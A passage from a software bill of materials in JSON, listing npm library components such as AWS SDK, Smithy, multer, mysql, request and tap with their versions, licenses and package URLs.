"}],"purl":"pkg:npm/%40aws-sdk/middleware-user-agent@3.972.0"},{"bom-ref":"257-@aws-sdk/util-endpoints@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/util-endpoints","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/util-endpoints@3.972.0"},{"bom-ref":"258-@smithy/util-endpoints@3.2.8","type":"library","group":"@smithy","name":"@smithy/util-endpoints","version":"3.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-endpoints@3.2.8"},{"bom-ref":"259-@aws-sdk/region-config-resolver@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/region-config-resolver","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/region-config-resolver@3.972.0"},{"bom-ref":"260-@smithy/config-resolver@4.4.6","type":"library","group":"@smithy","name":"@smithy/config-resolver","version":"4.4.6","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/config-resolver@4.4.6"},{"bom-ref":"261-@smithy/util-config-provider@4.2.0","type":"library","group":"@smithy","name":"@smithy/util-config-provider","version":"4.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-config-provider@4.2.0"},{"bom-ref":"262-@aws-sdk/util-user-agent-browser@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/util-user-agent-browser","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/util-user-agent-browser@3.972.0"},{"bom-ref":"263-bowser@2.13.1","type":"library","name":"bowser","version":"2.13.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/bowser@2.13.1"},{"bom-ref":"264-@aws-sdk/util-user-agent-node@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/util-user-agent-node","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/util-user-agent-node@3.972.0"},{"bom-ref":"265-@smithy/hash-node@4.2.8","type":"library","group":"@smithy","name":"@smithy/hash-node","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/hash-node@4.2.8"},{"bom-ref":"266-@smithy/invalid-dependency@4.2.8","type":"library","group":"@smithy","name":"@smithy/invalid-dependency","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/invalid-dependency@4.2.8"},{"bom-ref":"267-@smithy/middleware-content-length@4.2.8","type":"library","group":"@smithy","name":"@smithy/middleware-content-length","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/middleware-content-length@4.2.8"},{"bom-ref":"268-@smithy/middleware-retry@4.4.26","type":"library","group":"@smithy","name":"@smithy/middleware-retry","version":"4.4.26","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/middleware-retry@4.4.26"},{"bom-ref":"269-@smithy/service-error-classification@4.2.8","type":"library","group":"@smithy","name":"@smithy/service-error-classification","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/service-error-classification@4.2.8"},{"bom-ref":"270-@smithy/util-retry@4.2.8","type":"library","group":"@smithy","name":"@smithy/util-retry","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-retry@4.2.8"},{"bom-ref":"271-@smithy/util-body-length-node@4.2.1","type":"library","group":"@smithy","name":"@smithy/util-body-length-node","version":"4.2.1","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-body-length-node@4.2.1"},{"bom-ref":"272-@smithy/util-defaults-mode-browser@4.3.25","type":"library","group":"@smithy","name":"@smithy/util-defaults-mode-browser","version":"4.3.25","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-defaults-mode-browser@4.3.25"},{"bom-ref":"273-@smithy/util-defaults-mode-node@4.2.28","type":"library","group":"@smithy","name":"@smithy/util-defaults-mode-node","version":"4.2.28","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-defaults-mode-node@4.2.28"},{"bom-ref":"274-@smithy/credential-provider-imds@4.2.8","type":"library","group":"@smithy","name":"@smithy/credential-provider-imds","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/credential-provider-imds@4.2.8"},{"bom-ref":"275-@aws-sdk/credential-provider-process@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-provider-process","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-provider-process@3.972.0"},{"bom-ref":"276-@aws-sdk/credential-provider-sso@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-provider-sso","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-provider-sso@3.972.0"},{"bom-ref":"277-@aws-sdk/client-sso@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/client-sso","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/client-sso@3.972.0"},{"bom-ref":"278-@aws-sdk/token-providers@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/token-providers","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/token-providers@3.972.0"},{"bom-ref":"279-@aws-sdk/credential-provider-web-identity@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-provider-web-identity","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-provider-web-identity@3.972.0"},{"bom-ref":"280-@aws-sdk/credential-provider-cognito-identity@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-provider-cognito-identity","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-provider-cognito-identity@3.972.0"},{"bom-ref":"281-@mongodb-js/saslprep@1.4.5","type":"library","group":"@mongodb-js","name":"@mongodb-js/saslprep","version":"1.4.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40mongodb-js/saslprep@1.4.5"},{"bom-ref":"282-mpath@0.9.0","type":"library","name":"mpath","version":"0.9.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mpath@0.9.0"},{"bom-ref":"283-mquery@4.0.3","type":"library","name":"mquery","version":"4.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mquery@4.0.3"},{"bom-ref":"284-sift@16.0.1","type":"library","name":"sift","version":"16.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/sift@16.0.1"},{"bom-ref":"285-morgan@1.10.0","type":"library","name":"morgan","version":"1.10.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/morgan@1.10.0"},{"bom-ref":"286-basic-auth@2.0.1","type":"library","name":"basic-auth","version":"2.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/basic-auth@2.0.1"},{"bom-ref":"287-on-finished@2.3.0","type":"library","name":"on-finished","version":"2.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/on-finished@2.3.0"},{"bom-ref":"288-ee-first@1.1.1","type":"library","name":"ee-first","version":"1.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ee-first@1.1.1"},{"bom-ref":"289-ms@0.7.3","type":"library","name":"ms","version":"0.7.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ms@0.7.3"},{"bom-ref":"290-multer@2.0.2","type":"library","name":"multer","version":"2.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/multer@2.0.2"},{"bom-ref":"291-append-field@1.0.0","type":"library","name":"append-field","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/append-field@1.0.0"},{"bom-ref":"292-concat-stream@2.0.0","type":"library","name":"concat-stream","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/concat-stream@2.0.0"},{"bom-ref":"293-buffer-from@1.1.1","type":"library","name":"buffer-from","version":"1.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/buffer-from@1.1.1"},{"bom-ref":"294-readable-stream@3.6.2","type":"library","name":"readable-stream","version":"3.6.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/readable-stream@3.6.2"},{"bom-ref":"295-typedarray@0.0.6","type":"library","name":"typedarray","version":"0.0.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/typedarray@0.0.6"},{"bom-ref":"296-mkdirp@0.5.6","type":"library","name":"mkdirp","version":"0.5.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mkdirp@0.5.6"},{"bom-ref":"297-minimist@1.2.8","type":"library","name":"minimist","version":"1.2.8","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/minimist@1.2.8"},{"bom-ref":"298-object-assign@4.1.1","type":"library","name":"object-assign","version":"4.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/object-assign@4.1.1"},{"bom-ref":"299-type-is@1.6.18","type":"library","name":"type-is","version":"1.6.18","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/type-is@1.6.18"},{"bom-ref":"300-mime-types@2.1.35","type":"library","name":"mime-types","version":"2.1.35","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime-types@2.1.35"},{"bom-ref":"301-mime-db@1.52.0","type":"library","name":"mime-db","version":"1.52.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime-db@1.52.0"},{"bom-ref":"302-xtend@4.0.2","type":"library","name":"xtend","version":"4.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/xtend@4.0.2"},{"bom-ref":"303-mysql@2.18.1","type":"library","name":"mysql","version":"2.18.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mysql@2.18.1"},{"bom-ref":"304-bignumber.js@9.0.0","type":"library","name":"bignumber.js","version":"9.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/bignumber.js@9.0.0"},{"bom-ref":"305-sqlstring@2.3.1","type":"library","name":"sqlstring","version":"2.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/sqlstring@2.3.1"},{"bom-ref":"306-node-cron@3.0.3","type":"library","name":"node-cron","version":"3.0.3","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/node-cron@3.0.3"},{"bom-ref":"307-uuid@8.3.2","type":"library","name":"uuid","version":"8.3.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/uuid@8.3.2"},{"bom-ref":"308-npmconf@0.0.24","type":"library","name":"npmconf","version":"0.0.24","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/npmconf@0.0.24"},{"bom-ref":"309-config-chain@1.1.12","type":"library","name":"config-chain","version":"1.1.12","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/config-chain@1.1.12"},{"bom-ref":"310-ini@1.3.5","type":"library","name":"ini","version":"1.3.5","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/ini@1.3.5"},{"bom-ref":"311-proto-list@1.2.4","type":"library","name":"proto-list","version":"1.2.4","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/proto-list@1.2.4"},{"bom-ref":"312-inherits@1.0.2","type":"library","name":"inherits","version":"1.0.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/inherits@1.0.2"},{"bom-ref":"313-ini@1.1.0","type":"library","name":"ini","version":"1.1.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/ini@1.1.0"},{"bom-ref":"314-mkdirp@0.3.5","type":"library","name":"mkdirp","version":"0.3.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mkdirp@0.3.5"},{"bom-ref":"315-nopt@2.2.1","type":"library","name":"nopt","version":"2.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/nopt@2.2.1"},{"bom-ref":"316-abbrev@1.1.1","type":"library","name":"abbrev","version":"1.1.1","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/abbrev@1.1.1"},{"bom-ref":"317-once@1.1.1","type":"library","name":"once","version":"1.1.1","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/once@1.1.1"},{"bom-ref":"318-osenv@0.0.3","type":"library","name":"osenv","version":"0.0.3","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/osenv@0.0.3"},{"bom-ref":"319-semver@1.1.4","type":"library","name":"semver","version":"1.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/semver@1.1.4"},{"bom-ref":"320-optional@0.1.4","type":"library","name":"optional","version":"0.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/optional@0.1.4"},{"bom-ref":"321-st@0.2.4","type":"library","name":"st","version":"0.2.4","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/st@0.2.4"},{"bom-ref":"322-async-cache@0.1.5","type":"library","name":"async-cache","version":"0.1.5","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/async-cache@0.1.5"},{"bom-ref":"323-lru-cache@2.3.1","type":"library","name":"lru-cache","version":"2.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/lru-cache@2.3.1"},{"bom-ref":"324-fd@0.0.3","type":"library","name":"fd","version":"0.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/fd@0.0.3"},{"bom-ref":"325-mime@1.2.11","type":"library","name":"mime","version":"1.2.11","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime@1.2.11"},{"bom-ref":"326-negotiator@0.2.8","type":"library","name":"negotiator","version":"0.2.8","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/negotiator@0.2.8"},{"bom-ref":"327-graceful-fs@1.2.3","type":"library","name":"graceful-fs","version":"1.2.3","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/graceful-fs@1.2.3"},{"bom-ref":"328-stream-buffers@3.0.2","type":"library","name":"stream-buffers","version":"3.0.2","licenses":[{"expression":"Unlicense"}],"purl":"pkg:npm/stream-buffers@3.0.2"},{"bom-ref":"329-tap@11.1.5","type":"library","name":"tap","version":"11.1.5","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/tap@11.1.5"},{"bom-ref":"330-bind-obj-methods@2.0.0","type":"library","name":"bind-obj-methods","version":"2.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/bind-obj-methods@2.0.0"},{"bom-ref":"331-clean-yaml-object@0.1.0","type":"library","name":"clean-yaml-object","version":"0.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/clean-yaml-object@0.1.0"},{"bom-ref":"332-color-support@1.1.3","type":"library","name":"color-support","version":"1.1.3","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/color-support@1.1.3"},{"bom-ref":"333-coveralls@3.0.9","type":"library","name":"coveralls","version":"3.0.9","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/coveralls@3.0.9"},{"bom-ref":"334-lcov-parse@1.0.0","type":"library","name":"lcov-parse","version":"1.0.0","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/lcov-parse@1.0.0"},{"bom-ref":"335-log-driver@1.2.7","type":"library","name":"log-driver","version":"1.2.7","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/log-driver@1.2.7"},{"bom-ref":"336-request@2.88.0","type":"library","name":"request","version":"2.88.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/request@2.88.0"},{"bom-ref":"337-aws-sign2@0.7.0","type":"library","name":"aws-sign2","version":"0.7.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/aws-sign2@0.7.0"},{"bom-ref":"338-aws4@1.9.1","type":"library","name":"aws4","version":"1.9.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/aws4@1.9.1"},{"bom-ref":"339-caseless@0.12.0","type":"library","name":"caseless","version":"0.12.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/caseless@0.12.0"},{"bom-ref":"340-combined-stream@1.0.8","type":"library","name":"combined-stream","version":"1.0.8","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/combined-stream@1.0.8"},{"bom-ref":"341-delayed-stream@1.0.0","type":"library","name":"delayed-stream","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/delayed-stream@1.0.0"},{"bom-ref":"342-extend@3.0.2","type":"library","name":"extend","version":"3.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/extend@3.0.2"},{"bom-ref":"343-forever-agent@0.6.1","type":"library","name":"forever-agent","version":"0.6.1","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/forever-agent@0.6.1"},{"bom-ref":"344-form-data@2.3.3","type":"library","name":"form-data","version":"2.3.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/form-data@2.3.3"},{"bom-ref":"345-asynckit@0.4.0","type":"library","name":"asynckit","version":"0.4.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/asynckit@0.4.0"},{"bom-ref":"346-mime-types@2.1.26","type":"library","name":"mime-types","version":"2.1.26","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime-types@2.1.26"},{"bom-ref":"347-mime-db@1.43.0","type":"library","name":"mime-db","version":"1.43.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime-db@1.43.0"},{"bom-ref":"348-har-validator@5.1.3","type":"library","name":"har-validator","version":"5.1.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/har-validator@5.1.3"},{"bom-ref":"349-ajv@6.10.2","type":"library","name":"ajv","version":"6.10.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ajv@6.10.2"},{"bom-ref":"350-fast-deep-equal@2.0.1","type":"library","name":"fast-deep-equal","version":"2.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/fast-deep-equal@2.0.1"},{"bom-ref":"351-fast-json-stable-stringify@2.1.0","type":"library","name":"fast-json-stable-stringify","version":"2.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/fast-json-stable-stringify@2.1.0"},{"bom-ref":"352-json-schema-traverse@0.4.1","type":"library","name":"json-schema-traverse","version":"0.4.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/json-schema-traverse@0.4.1"},{"bom-ref":"353-uri-js@4.2.2","type":"library","name":"uri-js","version":"4.2.2","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/uri-js@4.2.2"},{"bom-ref":"354-har-schema@2.0.0","type":"library","name":"har-schema","version":"2.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/har-schema@2.0.0"},{"bom-ref":"355-http-signature@1.2.0","type":"library","name":"http-signature","version":"1.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/http-signature@1.2.0"},{"bom-ref":"356-assert-plus@1.0.0","type":"library","name":"assert-plus","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/assert-plus@1.0.0"},{"bom-ref":"357-jsprim@1.4.1","type":"library","name":"jsprim","version":"1.4.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/jsprim@1.4.1"},{"bom-ref":"358-extsprintf@1.3.0","type":"library","name":"extsprintf","version":"1.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/extsprintf@1.3.0"},{"bom-ref":"359-json-schema@0.2.3","type":"library","name":"json-schema","version":"0.2.3","licenses":[{"expression":"(AFL-2.1 OR BSD-2-Clause)"}],"purl":"pkg:npm/json-schema@0.2.3"},{"bom-ref":"360-verror@1.10.0","type":"library","name":"verror","version":"1.10.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/verror@1.10.0"},{"bom-ref":"361-sshpk@1.16.1","type":"library","name":"sshpk","version":"1.16.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/sshpk@1.16.1"},{"bom-ref":"362-asn1@0.2.4","type":"library","name":"asn1","version":"0.2.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/asn1@0.2.4"},{"bom-ref":"363-bcrypt-pbkdf@1.0.2","type":"library","name":"bcrypt-pbkdf","version":"1.0.2","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/bcrypt-pbkdf@1.0.2"},{"bom-ref":"364-tweetnacl@0.14.5","type":"library","name":"tweetnacl","version":"0.14.5","licenses":[{"expression":"Unlicense"}],"purl":"pkg:npm/tweetnacl@0.14.5"},{"bom-ref":"365-dashdash@1.14.1","type":"library","name":"dashdash","version":"1.14.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/dashdash@1.14.1"},{"bom-ref":"366-ecc-jsbn@0.1.2","type":"library","name":"ecc-jsbn","version":"0.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ecc-jsbn@0.1.2"},{"bom-ref":"367-jsbn@0.1.1","type":"library","name":"jsbn","version":"0.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/jsbn@0.1.1"},{"bom-ref":"368-getpass@0.1.7","type":"library","name":"getpass","version":"0.1.7","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/getpass@0.1.7"},{"bom-ref":"369-is-typedarray@1.0.0","type":"library","name":"is-typedarray","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-typedarray@1.0.0"},{"bom-ref":"370-isstream@0.1.2","type":"library","name":"isstream","version":"0.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/isstream@0.1.2"},{"bom-ref":"371-json-stringify-safe@5.0.1","type":"library","name":"json-stringify-safe","version":"5.0.1","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/json-stringify-safe@5.0.1"},{"bom-ref":"372-oauth-sign@0.9.0","type":"library","name":"oauth-sign","version":"0.9.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/oauth-sign@0.9.0"},{"bom-ref":"373-performance-now@2.1.0","type":"library","name":"performance-now","version":"2.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/performance-now@2.1.0"},{"bom-ref":"374-qs@6.5.2","type":"library","name":"qs","version":"6.5.2","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/qs@6.5.2"},{"bom-ref":"375-tough-cookie@2.4.3","type":"library","name":"tough-cookie","version":"2.4.3","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/tough-cookie@2.4.3"},{"bom-ref":"376-psl@1.7.0","type":"library","name":"psl","version":"1.7.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/psl@1.7.0"},{"bom-ref":"377-punycode@1.4.1","type":"library","name":"punycode","version":"1.4.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/punycode@1.4.1"},{"bom-ref":"378-tunnel-agent@0.6.0","type":"library","name":"tunnel-agent","version":"0.6.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/tunnel-agent@0.6.0"},{"bom-ref":"379-uuid@3.3.2","type":"library","name":"uuid","version":"3.3.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/uuid@3.3.2"},{"bom-ref":"380-foreground-child@1.5.6","type":"library","name":"foreground-child","version":"1.5.6","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/foreground-child@1.5.6"},{"bom-ref":"381-cross-spawn@4.0.2","type":"library","name":"cross-spawn","version":"4.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/cross-spawn@4.0.2"},{"bom-ref":"382-lru-cache@4.1.5","type":"library","name":"lru-cache","version":"4.1.5","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/lru-cache@4.1.5"},{"bom-ref":"383-pseudomap@1.0.2","type":"library","name":"pseudomap","version":"1.0.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/pseudomap@1.0.2"},{"bom-ref":"384-yallist@2.1.2","type":"library","name":"yallist","version":"2.1.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/yallist@2.1.2"},{"bom-ref":"385-which@1.3.1","type":"library","name":"which","version":"1.3.1","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/which@1.3.1"},{"bom-ref":"386-isexe@2.0.0","type":"library","name":"isexe","version":"2.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/isexe@2.0.0"},{"bom-ref":"387-signal-exit@3.0.2","type":"library","name":"signal-exit","version":"3.0.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/signal-exit@3.0.2"},{"bom-ref":"388-fs-exists-cached@1.0.0","type":"library","name":"fs-exists-cached","version":"1.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/fs-exists-cached@1.0.0"},{"bom-ref":"389-function-loop@1.0.2","type":"library","name":"function-loop","version":"1.0.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/function-loop@1.0.2"},{"bom-ref":"390-minipass@2.9.0","type":"library","name":"minipass","version":"2.9.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/minipass@2.9.0"},{"bom-ref":"391-yallist@3.1.1","type":"library","name":"yallist","version":"3.1.1","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/yallist@3.1.1"},{"bom-ref":"392-mkdirp@0.5.1","type":"library","name":"mkdirp","version":"0.5.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mkdirp@0.5.1"},{"bom-ref":"393-minimist@0.0.8","type":"library","name":"minimist","version":"0.0.8","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/minimist@0.0.8"},{"bom-ref":"394-nyc@11.9.0","type":"library","name":"nyc","version":"11.9.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/nyc@11.9.0"},{"bom-ref":"395-archy@1.0.0","type":"library","name":"archy","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/archy@1.0.0"},{"bom-ref":"396-arrify@1.0.1","type":"library","name":"arrify","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/arrify@1.0.1"},{"bom-ref":"397-caching-transform@1.0.1","type":"library","name":"caching-transform","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/caching-transform@1.0.1"},{"bom-ref":"398-md5-hex@1.3.0","type":"library","name":"md5-hex","version":"1.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/md5-hex@1.3.0"},{"bom-ref":"399-md5-o-matic@0.1.1","type":"library","name":"md5-o-matic","version":"0.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/md5-o-matic@0.1.1"},{"bom-ref":"400-write-file-atomic@1.3.4","type":"library","name":"write-file-atomic","version":"1.3.4","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/write-file-atomic@1.3.4"},{"bom-ref":"401-graceful-fs@4.1.11","type":"library","name":"graceful-fs","version":"4.1.11","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/graceful-fs@4.1.11"},{"bom-ref":"402-imurmurhash@0.1.4","type":"library","name":"imurmurhash","version":"0.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/imurmurhash@0.1.4"},{"bom-ref":"403-slide@1.1.6","type":"library","name":"slide","version":"1.1.6","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/slide@1.1.6"},{"bom-ref":"404-convert-source-map@1.5.1","type":"library","name":"convert-source-map","version":"1.5.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/convert-source-map@1.5.1"},{"bom-ref":"405-debug-log@1.0.1","type":"library","name":"debug-log","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/debug-log@1.0.1"},{"bom-ref":"406-default-require-extensions@1.0.0","type":"library","name":"default-require-extensions","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/default-require-extensions@1.0.0"},{"bom-ref":"407-strip-bom@2.0.0","type":"library","name":"strip-bom","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/strip-bom@2.0.0"},{"bom-ref":"408-is-utf8@0.2.1","type":"library","name":"is-utf8","version":"0.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-utf8@0.2.1"},{"bom-ref":"409-find-cache-dir@0.1.1","type":"library","name":"find-cache-dir","version":"0.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/find-cache-dir@0.1.1"},{"bom-ref":"410-commondir@1.0.1","type":"library","name":"commondir","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/commondir@1.0.1"},{"bom-ref":"411-pkg-dir@1.0.0","type":"library","name":"pkg-dir","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/pkg-dir@1.0.0"},{"bom-ref":"412-find-up@1.1.2","type":"library","name":"find-up","version":"1.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/find-up@1.1.2"},{"bom-ref":"413-path-exists@2.1.0","type":"library","name":"path-exists","version":"2.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/path-exists@2.1.0"},{"bom-ref":"414-pinkie-promise@2.0.1","type":"library","name":"pinkie-promise","version":"2.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/pinkie-promise@2.0.1"},{"bom-ref":"415-pinkie@2.0.4","type":"library","name":"pinkie","version":"2.0.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/pinkie@2.0.4"},{"bom-ref":"416-find-up@2.1.0","type":"library","name":"find-up","version":"2.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/find-up@2.1.0"},{"bom-ref":"417-locate-path@2.0.0","type":"library","name":"locate-path","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/locate-path@2.0.0"},{"bom-ref":"418-p-locate@2.0.0","type":"library","name":"p-locate","version":"2.0.0","licenses":[{"